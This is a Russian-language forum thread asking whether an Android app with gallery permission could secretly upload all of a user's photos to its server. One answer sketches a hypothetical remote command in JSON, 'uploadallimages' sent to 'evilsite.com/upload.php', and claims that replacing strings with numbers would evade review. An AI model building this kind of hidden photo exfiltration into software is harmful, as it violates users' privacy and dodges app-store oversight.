Задать вопрос
petushok55
@petushok55
Обучаюсь на практике.
android

Может ли приложение, получив доступ к галерее, взять и отправить втихую все фотки себе на сервер?

что думаете по этому поводу?
если это технически возможно, то отследить можно только с помощью сниффера думаю, но думаю крупные компании таким не промышляют, потому что хоть один случай выявится, то репутации больно будет, а вот мелкие, или другие, которым пофиг
  • Вопрос задан
  • 451 просмотр
1 комментарий
Подписаться 2 Простой 1 комментарий
Пригласить эксперта
Ответы на вопрос 3
@pfg21
ex-турист
да. может. если есть дырка доступ значит есть доступ.
но гугл такие приложения активно отслеживает и банит.
Ответ написан
Комментировать
Комментировать
@402d
начинал с бейсика на УКНЦ в 1988
Отправка фоток на сервер в фоне обычное поведение для любых сетевых дисков.
В этом нет ничего криминального. Остаётся разобраться с термином в тихую.
Фонарику такое нелогично. Явно троян.
Не давно ввели анкету о персональных данных. Фото туда попадают. Надо декларировать.

На сколько там жёстко именно с фото не в курсе.

Сам словил такое. Заявил что не собираю.
Летит отклонение на очередное обновление. Слышь там у тебя есть ввод телефона. Меняй анкету или убирай.

Мля . Модерации писать бесполезно. Никого не волнует, что это ввод для формирования куар кода. Через месяц обнули раздел . А обновы на Бет или частичное внедрение не проходят. Только фулл ролаут допустим. Блин у меня из-за такого развертывания 50 тысяч ошибку словили. Две недели срочные фиксы выпускал

Так я тому, что если в разделе написал, что фото передаешь на сервер, то можно хоть это будет не очевидно в самом приложении.
Ответ написан
Комментировать
Комментировать
firedragon
@firedragon
Не джун-мидл-сеньор, а трус-балбес-бывалый.
Хм предположим гипотетически что у приложения есть разрешения на галерею и интернет доступ.
Пусть оно обращается к серверу и получает json.
Пусть json выглядит примерно так:
"cmd": "uploadallimages",
"url": "https://evilsite.com/upload.php"


Никакая проверка не выявит ничего подозрительного, тем более что строки можно заменить цифрами.
Никакой сниффер кстати не поможет, будет только факт трафика по какому то адресу.
Ответ написан
Комментировать
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
Вакансии с Хабр Карьеры
Android-разработчик / Senior Android Developer
Ciliz Санкт-Петербург
от 300 000 ₽
Middle Android разработчик
Effective Mobile
от 150 000 ₽
Senior Android Developer
Hodl Hodl
от 2 500 до 5 000 $
Ещё вакансии
Заказы с Хабр Фриланса
Помощь с версткой WPF/XAML
27 апр. 2024, в 16:39
1000 руб./в час
Паррсер-краулер на Go
27 апр. 2024, в 16:38
30000 руб./за проект
Юрист в IT для составления ответа на претензию и представления в суде
27 апр. 2024, в 16:36
6000 руб./за проект
Ещё заказы